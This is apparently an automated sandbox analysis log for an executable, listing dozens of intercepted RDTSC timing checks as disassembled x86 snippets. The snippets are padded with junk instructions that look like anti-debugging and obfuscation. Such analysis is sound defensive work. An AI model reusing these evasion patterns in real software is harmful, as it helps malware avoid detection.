Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FAB7B second address: 3FABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov edx, esi 0x0000000b call 00007F9B30E293BDh 0x00000010 mov dh, 0Fh 0x00000012 pop edx 0x00000013 push dword ptr [ebp+12466B0Fh] 0x00000019 xor dl, 00000010h 0x0000001c call 00007F9B30E293B9h 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FABAD second address: 3FABED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d jns 00007F9B30829928h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push esi 0x0000001b jnc 00007F9B30829930h 0x00000021 pop esi 0x00000022 mov eax, dword ptr [eax] 0x00000024 push edi 0x00000025 jo 00007F9B30829928h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 pushad 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FC09D second address: 3FC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0031 second address: 4AD003F instructions: 0x00000000 rdtsc 0x00000002 mov si, 6A3Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD003F second address: 4AD0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 mov ah, 61h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F9B30E293C2h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0063 second address: 4AD0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0069 second address: 4AD0094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 jmp 00007F9B30E293C7h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edi, cx 0x00000016 mov al, D6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0094 second address: 4AD00B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD00B5 second address: 4AD00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD00B9 second address: 4AD00BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0F6F second address: 4AB0F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0F73 second address: 4AB0F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0AB8 second address: 4AF0ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0ABE second address: 4AF0AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A900E3 second address: 4A900F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B30E293BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A900F5 second address: 4A9017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f pushfd 0x00000010 jmp 00007F9B30829930h 0x00000015 sub esi, 4486EA58h 0x0000001b jmp 00007F9B3082992Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F9B30829934h 0x0000002b adc ecx, 5A4674B8h 0x00000031 jmp 00007F9B3082992Bh 0x00000036 popfd 0x00000037 mov di, cx 0x0000003a popad 0x0000003b push dword ptr [ebp+04h] 0x0000003e jmp 00007F9B30829932h 0x00000043 push dword ptr [ebp+0Ch] 0x00000046 pushad 0x00000047 movzx eax, bx 0x0000004a push eax 0x0000004b push edx 0x0000004c mov esi, edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9017C second address: 4A901B7 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9B30E293C5h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, dx 0x00000014 call 00007F9B30E293C5h 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A901B7 second address: 4A901BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0C91 second address: 4AB0CAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0897 second address: 4AB089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB089B second address: 4AB08A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB08A1 second address: 4AB08C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9B3082992Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB08C8 second address: 4AB08CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB08CE second address: 4AB08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB08D2 second address: 4AB08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F9B30E293C9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB08FC second address: 4AB0900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0900 second address: 4AB0906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0508 second address: 4AB050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB050D second address: 4AB053D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9B30E293C6h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB053D second address: 4AB0596 instructions: 0x00000000 rdtsc 0x00000002 mov dl, 21h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F9B30829936h 0x0000000c add ecx, 471E0788h 0x00000012 jmp 00007F9B3082992Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F9B30829932h 0x00000023 sbb ecx, 4553E9E8h 0x00000029 jmp 00007F9B3082992Bh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0596 second address: 4AB05AA instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dl, 9Dh 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ecx, 765C2CCFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB05AA second address: 4AB05D9 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, 14F4h 0x0000000b popad 0x0000000c pop ebp 0x0000000d pushad 0x0000000e call 00007F9B30829939h 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0250 second address: 4AC02A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9B30E293C1h 0x00000009 and ecx, 1FA0F0C6h 0x0000000f jmp 00007F9B30E293C1h 0x00000014 popfd 0x00000015 mov di, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F9B30E293BAh 0x00000021 push eax 0x00000022 pushad 0x00000023 push edi 0x00000024 mov cl, F2h 0x00000026 pop edx 0x00000027 mov edi, ecx 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov edi, 2251EEB0h 0x00000033 mov dh, 45h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC02A3 second address: 4AC02E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9B3082992Bh 0x00000014 add cx, 4A0Eh 0x00000019 jmp 00007F9B30829939h 0x0000001e popfd 0x0000001f push ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC02E5 second address: 4AC02EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0990 second address: 4AF09A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B3082992Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF09A0 second address: 4AF09EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9B30E293BFh 0x00000013 add eax, 4F39B69Eh 0x00000019 jmp 00007F9B30E293C9h 0x0000001e popfd 0x0000001f movzx esi, bx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF09EE second address: 4AF09F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF09F2 second address: 4AF0A06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A06 second address: 4AF0A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A0C second address: 4AF0A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A10 second address: 4AF0A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A14 second address: 4AF0A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9B30E293C9h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ah, bl 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A3F second address: 4AF0A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A44 second address: 4AF0A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0A4A second address: 4AF0A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD04D1 second address: 4AD04E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B30E293C3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD04E8 second address: 4AD0582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 08ECC303h 0x00000012 pushfd 0x00000013 jmp 00007F9B30829938h 0x00000018 sub ax, C0C8h 0x0000001d jmp 00007F9B3082992Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007F9B30829939h 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edi, si 0x00000031 pushfd 0x00000032 jmp 00007F9B30829934h 0x00000037 or esi, 64367588h 0x0000003d jmp 00007F9B3082992Bh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0582 second address: 4AD0588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0588 second address: 4AD058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD058C second address: 4AD0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0590 second address: 4AD05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD05A0 second address: 4AD05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD05A4 second address: 4AD05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD05AA second address: 4AD0622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F9B30E293C6h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 jmp 00007F9B30E293C0h 0x00000019 and dword ptr [eax+04h], 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F9B30E293C3h 0x00000028 xor si, 0D3Eh 0x0000002d jmp 00007F9B30E293C9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0622 second address: 4AD0628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0628 second address: 4AD062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD062C second address: 4AD0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB06C3 second address: 4AB06C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB06C9 second address: 4AB06D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB06D8 second address: 4AB06EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB06EB second address: 4AB0734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 13F560EAh 0x00000008 jmp 00007F9B3082992Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9B3082992Bh 0x0000001a adc esi, 78901A3Eh 0x00000020 jmp 00007F9B30829939h 0x00000025 popfd 0x00000026 mov ebx, esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB0734 second address: 4AB073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AB073A second address: 4AB073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AC0ED9 second address: 4AC0F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 mov ch, B6h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F9B30E293C8h 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 movzx esi, bx 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F9B30E293BEh 0x00000024 pushfd 0x00000025 jmp 00007F9B30E293C2h 0x0000002a add cx, 1678h 0x0000002f jmp 00007F9B30E293BBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD02C9 second address: 4AD0317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9B30829931h 0x00000009 and cx, CA96h 0x0000000e jmp 00007F9B30829931h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F9B3082992Ch 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9B3082992Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD0317 second address: 4AD031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD031D second address: 4AD034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9B3082992Ch 0x00000008 pop ecx 0x00000009 mov dh, FDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9B30829934h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AD034B second address: 4AD0351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF02BC second address: 4AF02C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF02C2 second address: 4AF0308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c popad 0x0000000d mov dword ptr [esp], ecx 0x00000010 pushad 0x00000011 mov ebx, 76A41384h 0x00000016 movsx edx, cx 0x00000019 popad 0x0000001a mov eax, dword ptr [778165FCh] 0x0000001f jmp 00007F9B30E293C4h 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 call 00007F9B30E293BEh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0308 second address: 4AF035B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 mov si, dx 0x00000009 pushfd 0x0000000a jmp 00007F9B30829933h 0x0000000f or si, 3EAEh 0x00000014 jmp 00007F9B30829939h 0x00000019 popfd 0x0000001a popad 0x0000001b popad 0x0000001c je 00007F9BA34CCF46h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F9B3082992Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF035B second address: 4AF0381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9B30E293BDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0381 second address: 4AF0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B3082992Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0391 second address: 4AF03A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF03A2 second address: 4AF03A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
